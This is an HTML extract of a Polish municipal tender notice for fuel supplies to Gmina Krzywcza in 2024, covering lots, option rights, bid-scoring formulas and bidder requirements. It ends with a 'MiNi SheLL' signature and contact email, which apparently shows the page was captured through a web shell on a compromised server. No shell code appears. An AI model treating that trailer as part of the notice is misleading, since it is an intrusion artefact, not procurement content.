do 15;00.<br/>5.Oferowany olej napędowy musi spełniać wymogi jakościowe dla paliw ciekłych określone:<br/>-Rozporządzeniem Ministra Gospodarki z dnia 09 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych <br/>(t.j. Dz. U. z 2023r poz.1314) <br/>-PN-EN 590:2013+A1:2017: Paliwa do pojazdów samochodowych – Oleje napędowe – Wymagania i metody badań.<br/>6.Wykonawca zobowiązany będzie dostarczać olej napędowy w odmianie odpowiedniej dla danej pory roku, zapewniając spełnienie przez dostarczane paliwo odpowiednich własności niskotemperaturowych.<br/>7.Wykonawca zobowiązany będzie dostarczyć przedmiot umowy autocysterną. Pomiar ilości dostarczanego oleju napędowego dokonywany będzie wg. elektronicznego urządzenia pomiarowego „Petro-Vend” posiadającego legalizację Obwodowego Urzędu Miar. <br/>8.Zasady wymiany informacji w tym dokumentów elektronicznych, pomiędzy podmiotami publicznymi, o których mowa w ustawie z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014r. poz. 1114) reguluje Regulamin korzystania z Platformy Usług Elektronicznych Skarbowo-Celnych (PUESC). Zgodnie z art.5 punkt 1: W przypadku przewozu towaru rozpoczynającego się na terytorium kraju podmiot wysyłający jest obowiązany, przed rozpoczęciem przewozu towaru, przesłać do rejestru zgłoszenie, uzyskać numer referencyjny dla tego zgłoszenia i przekazać ten numer przewoźnikowi. W przypadku dostawy towarów i usług, zwanej dalej ,,dostawą towarów”, podmiot wysyłający jest obowiązany również przekazać numer referencyjny podmiotowi odbierającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość skorzystania z prawa opcji zgodnie z art. 441 ustawy Pzp. Prawo opcji obejmuje uprawnienie Zamawiającego do zwiększenia lub zrezygnowania z zakupu lub dostaw paliw płynnych w ramach prawa opcji w ilości nie przekraczającej 15% (piętnaście procent) wynagrodzenie brutto.<br/>2.	Zamawiający będzie uprawniony do skorzystania z prawa opcji, o którym mowa w ust. 1 zgodnie z poniższymi warunkami: <br/>1). Zamawiający ma prawo skorzystać z prawa opcji najpóźniej na 1 miesiąc przed upływem terminu realizacji przedmiotu zamówienia. <br/>2) Zamawiający może przed wpływem ww. terminu złożyć oświadczenie o nieskorzystaniu z prawa opcji. <br/>3.	Skorzystanie z prawa opcji przez Zamawiającego nie jest obowiązkowe.<br/>4.	W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługuje żadne roszczenie z tego tytułu poza zapłatą wynagrodzenia.<br/>5.	W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystaniu z prawa opcji w niepełnym zakresie Wykonawcy nie przysługuje żadne roszczenie z tego tytułu.<br/>6.	Warunkiem skorzystania przez Zamawiającego z prawa opcji jest złożenie przez przedstawiciela Zamawiającego w terminie wskazanym w ust.2 pkt.1 powyżej, oświadczenia woli o skorzystaniu z tego prawa, w którym przedstawiciel Zamawiającego wskaże wartość, która nie może przekroczyć 15% ( piętnaście procent) wynagrodzenia. <br/>7.	Oświadczenie, o którym mowa w ust.6 Zamawiający złoży na piśmie lub w formie elektronicznej lub postaci elektronicznej z podpisem elektronicznym. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Ocenie poddane zostaną oferty niepodlegające odrzuceniu.<br/>2.Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>dot. części nr 2 <br/>- Cena (C) – waga kryterium 60 % = 60 pkt<br/>Cena złożonej oferty powinna być ceną obowiązującą z dnia poprzedzającego dzień, który Zamawiający wyznaczył jako dzień składania i otwarcia ofert. <br/>- stała marża Wykonawcy (M) – waga kryterium 20 % = 20 pkt<br/>Wykonawca, który zaoferuje najniższą marżę otrzyma = 20 pkt<br/>- zaoferowany opust/rabat (O/R) – waga kryterium 20 % = 20 pkt<br/>Wykonawca, który zaoferuje najwyższy opust/rabat otrzyma = 20 pkt<br/>3. Zasady oceny ofert w poszczególnych kryteriach:<br/>a) cena, wg opisu poniżej: <br/> cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% = 60pkt<br/> cena oferty ocenianej brutto<br/><br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/> <br/>b) stała marża Wykonawcy, wg opisu poniżej: <br/><br/> <br/> najniższa zaoferowana stała marża wykonawcy *<br/>M = ---------------------------------------------------------------- x 100 pkt x 20% = 20pkt<br/> oceniana zaoferowana stała marża wykonawcy<br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/><br/>c)	zaoferowany przez Wykonawcę opust/rabat, wg opisu poniżej:<br/><br/> oceniany zaoferowany przez Wykonawcę opust /rabat<br/>O/R = ------------------------------------------------------------ x 100 pkt x 20% = 20pkt<br/> najwyższy zaoferowany opust/rabat<br/><br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">stała marża Wykonawcy (M)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaoferowany opust/rabat (O/R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Sukcesywne, bezgotówkowe zakupy olej napędowy w ilości 10 000 litrów i benzyna E10 w ilości 2 000 litrów.<br/>2. . Zakup paliw płynnych do samochodów dostawczych, autobusu oraz maszyn roboczych eksploatowanych przez Gminę Krzywcza, w szacunkowych ilościach:<br/>a).olej napędowy, wg PN-EN 590+A1:2017-6 lub równoważnej - 10 000 L<br/>b). benzyna E10 to nowa benzyna 95-oktanowa z zawartością do 10 proc. biokomponentów zastąpi dotychczasową benzynę 95, wg PN-EN 228+A1:2017-06 lub równoważnej - 2 000 L<br/>3.Benzyna E10 oraz olej napędowy powinny spełniać wymogi zawarte w w/w Polskich Normach oraz standardy zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (tekst jedn. Dz. U. z 2023 r., poz. 1314).<br/>4. Wymienione na wstępie ilości paliw mają charakter szacunkowy.<br/>5.Zamawiający dopuszcza możliwość odebrania mniejszej ilości paliw niż podane ilości szacunkowe.<br/>6. Zamawiający dopuszcza możliwość wzajemnej zamiany ilościowej w ramach wymienionych wyżej rodzajów paliw do wartości zawartej umowy. <br/>7.Zamawiający będzie odbierał paliwo stosownie do bieżących potrzeb, rozliczając się po cenach jednostkowych obowiązujących na stacjach paliw w dniu odbioru paliwa pomniejszonych o wartość opustu/rabatu Wykonawcy podany w Ofercie.<br/>8.W okresie zimowym, Zamawiający zastrzega sobie możliwość zakupu paliw o obniżonej temperaturze zablokowania zimnego filtra oraz z obniżoną temperaturą mętnienia z zastosowaniem wielkości udzielonego opustu/rabatu przez Wykonawcę dla paliw ujętych w umowie.<br/>9.Szczegółowe warunki realizacji zamówienia:<br/>1).	Wykonawca zapewni możliwość tankowania paliw tj. benzyny oraz oleju napędowego w miejscu oddalonym nie więcej niż 25 km od siedziby zamawiającego.<br/>2).	Wykonawca zapewni możliwość tankowania paliw tj. benzyny E10 oraz oleju napędowego w dni powszednie jak również w dni wolne od pracy, niedziele i święta.<br/>a). Dopuszcza się tankowanie paliwa tj. benzyny E10 oraz oleju napędowego do beczki lub kanistrów.<br/>b)	Zakup benzyny E10 i oleju napędowego dokonywany w stacjach paliw odbywał się będzie za pomocą kart paliwowych (flotowych) lub na podstawie faktury z odroczonym terminem płatności:<br/>- karty paliwowe będą wystawiane na numer rejestracyjny pojazdu lub okaziciela,<br/>- karty paliwowe muszą być zabezpieczone kodem typu PIN,<br/>- ilość kart paliwowych dla Gminy Krzywcza – 3 szt.,<br/>- nowe karty paliwowe winny zostać wydane Zamawiającemu nieodpłatnie ( ich wartość została ujęta w cenie złożonej oferty),<br/>- rodzaj kart	paliwowych	oraz	produktów nabywanych za ich	pomocą określi Zamawiający po podpisaniu umowy,<br/>- w przypadku utraty karty paliwowej Wykonawca zapewni jej blokadę po zgłoszonym zdarzeniu i wyda nieodpłatnie kartę zamienną,<br/>- w przypadku zakupu na podstawie faktury z odroczonym terminem płatności, zakup będzie realizowany wyłącznie po okazaniu przez kupującego stałego, imiennego upoważnienia wystawionego przez Zamawiającego.<br/>c). Wykonawca zobowiązany jest do jednoznacznego określenia terminu, ilości i rodzaju odebranej benzyny E10 lub oleju napędowego z pojazdem lub wpisem „kanister” oraz przekazanie kupującemu w imieniu Zamawiającego, dokumentu potwierdzającego następujące dane identyfikacyjne:<br/>- miejsce, adres stacji, data i godzina tankowania,<br/>- numer rejestracyjny pojazdu lub wpisu „kanister”,<br/>- rodzaj i ilość zatankowanego paliwa,<br/>- stan licznika przy tankowaniu (jeśli karta paliwa wydana zostanie na pojazd),<br/>- cenę jednostkową jednego litra paliwa lub wartość paliwa.<br/>d).	Rozliczenie	zawartych	transakcji	odbywać	się	będzie	za	pomocą	faktur	VAT wystawianych na koniec każdego miesiąca przy zakupie na podstawie karty paliwowej lub za pomocą wystawianych faktur VAT z odroczonym terminem płatności – 14 dni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132000-3 - Benzyna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Ocenie poddane zostaną oferty niepodlegające odrzuceniu.<br/>2.Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>dot. części nr 1 <br/>- Cena (C) – waga kryterium 60 % = 60 pkt<br/>Cena złożonej oferty powinna być ceną obowiązującą z dnia poprzedzającego dzień, który Zamawiający wyznaczył jako dzień składania i otwarcia ofert<br/>- zaoferowany opust/rabat (O/R) – waga kryterium 40 % = 40 pkt<br/>Wykonawca, który zaoferuje najwyższy opust/rabat otrzyma = 40 pkt<br/>3. Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>a) cena, wg opisu poniżej.<br/> cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% = 60pkt<br/> cena oferty ocenianej brutto<br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/> <br/>b) zaoferowany przez Wykonawcę opust/rabat, wg opisu poniżej:<br/><br/> oceniany zaoferowany przez Wykonawcę opust /rabat<br/>O/R = -------------------------------------------------------------------------------- x 100 pkt x 40% = 40pkt<br/> najwyższy zaoferowany opust/rabat<br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaoferowany przez Wykonawcę opust/rabat (O/R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia objętego niniejszym postępowaniem mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w tym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający wymaga aby Wykonawca posiadł aktualną koncesję udzieloną przez Prezesa Regulacji Energetyki na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi zgodnie z ustawą z dnia 10 kwietna 1997r. Prawo energetyczne (t.j. Dz. U. z 2022 poz. 1385 ze zm.) stanowiącymi przedmiot zamówienia - dot. zad. częściowego nr 1, nr 2 i nr 3.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/> Zamawiający nie stawia warunku w tym zakresie. <br/>4)	zdolności technicznej lub zawodowa :<br/>Zamawiający wymaga, aby wykonawca dysponował odpowiednim potencjałem technicznym w trakcie realizacji zamówienia, czyli urządzeniami dystrybucyjnymi -autocysternami w ilości co najmniej 2 szt. posiadającymi, dla zamontowanych na nich instalacji pomiarowych do paliw ciekłych - aktualną legalizację Urzędu Miar - dot. części nr 1 i nr 2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>- Oświadczenie w zakresie w art. 108 ust. 1 pkt 5 ustawy Pzp dotyczącego zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie – wzór oświadczenia stanowi Załącznik Nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu w zakresie:<br/>a) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – Wykonawca przedłoży uwierzytelnioną aktualną kserokopię koncesji udzielonej przez Prezesa Regulacji Energetyki na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi zgodnie z ustawą w dnia 10 kwietnia 1997r. Prawo energetyczne (t.j. Dz. U. z 2022 poz. 1385 ze zm.) dot. części 1-3<br/>b). zdolności technicznej lub zawodowej - Wykonawca przedłoży wykaz urządzeń technicznych – autocystern, dostępnych wykonawcy w celu wykonania zamówienia publicznego– wraz z informacja o podstawie do ich dysponowania- załącznik nr 9 do SWZ. dot. części 1-2</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Załącznik Nr 1 – Formularz Oferty; <br/>2)	Załącznik Nr 2 – Projektowane Postanowienia Umowy; <br/>3)	Załącznik Nr 3 – Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu; <br/>4)	Załącznik Nr 4 – Wzór zobowiązania podmiotu do oddania swoich zasobów Wykonawcy; <br/>5)	Załącznik Nr 5 – Szczegółowy Opis Przedmiotu Zamówienia (SOPZ); <br/>6)	Załącznik Nr 6 – Oświadczenie z art. 125 ust. 5 ustawy Pzp<br/>7)	Załącznik Nr 7 – Oświadczenie z art. 117 ust. 4 Pzp; <br/>8)	Załącznik Nr 8 – Oświadczenie z art. 108 ust. 1 pkt. 5 ustawy<br/>9)	Załącznik Nr 9 – Wykaz urządzeń- autocystern. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1, należy dołączyć do oferty. <br/>3.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem. <br/>4.	Wykonawca będący pełnomocnikiem Wykonawców występujących wspólnie składających ofertę za pośrednictwem www.platformazakupowa.pl wypełnia dane na Platformie dotyczące wszystkich podmiotów wspólnie ubiegających się o zamówienie. <br/>5.	W przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia, badanie braku podstaw do wykluczenia przeprowadzane będzie w odniesieniu do każdego z Wykonawców, natomiast spełnianie przez Wykonawców warunków udziału w postępowaniu oceniane będzie łącznie. <br/>6.	W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy, roboty budowlane lub usługi, do realizacji których zdolności te są wymagane. <br/>7.	Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <br/>8.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ponoszą wspólną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego (t.j.Dz.U.2023 poz.1610). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmianę umowy można dokonać zgodnie z art. 455 ustawy Pzp.<br/>2. Zmiana niniejszej umowy jest możliwa, gdy jest spowodowana:<br/>1) zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego,<br/>2) siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. <br/>W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum zwłoki w wykonywaniu swoich zobowiązań umownych, Pod pojęciem siły wyższej na potrzeby niniejszego warunku, należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od stron, którego nie można uniknąć, ani któremu nie mogły zapobiec Strony przy zachowaniu należytej staranności, oraz którego nie można przypisać drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności pożar, powódź, silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki trwające powyżej 7 dni roboczych lub inne zdarzenie związane z działaniem sił natury, <br/>3) zwłoki, przestojów zawinionych przez Zamawiającego,<br/>4) działania siły wyższej (na przykład: strajki generalne lub lokalne), mającej bezpośredni wpływ na termin danej, cząstkowej dostawy,<br/>3. Zmiany do umowy może inicjować Zamawiający lub Wykonawca składając pisemny wniosek do drugiej strony wraz z uzasadnieniem. W przypadku wniesienia wniosku przez Wykonawcę, Zamawiający zastrzega sobie prawo do zwrócenia się do Wykonawcy o przedłożenie dowodów na potwierdzenie wniosku inicjacyjnego o zmianę umowy.<br/>4. Wszystkie zmiany umowy dokonywane będą w formie pisemnej ( aneksu) i muszą być podpisane przez upoważnionych przedstawicieli obu stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/krzywcza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-05 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wszystkie koszty związane z uczestnictwem w postępowaniu , w szczególności z przygotowaniem i złożeniem oferty ponosi Wykonawca składający ofertę. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>2.Tajemnica przedsiębiorstwa- protokół, oferty oraz wszelkie oświadczenia i zaświadczenia składane w postępowaniu o zamówienie publiczne są jawne. Jeżeli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz.U. z 2022 r. poz. 1233),Wykonawca powinien nie później niż w terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa . Wykonawca, w celu utrzymania w poufności tych<br/>informacji, powinien przekazać je w wydzielonym i odpowiednio oznaczonym pliku. Zamawiający udostępni na wniosek zainteresowanego jawną część dokumentacji.

Creat By MiNi SheLL
Email: jattceo@gmail.com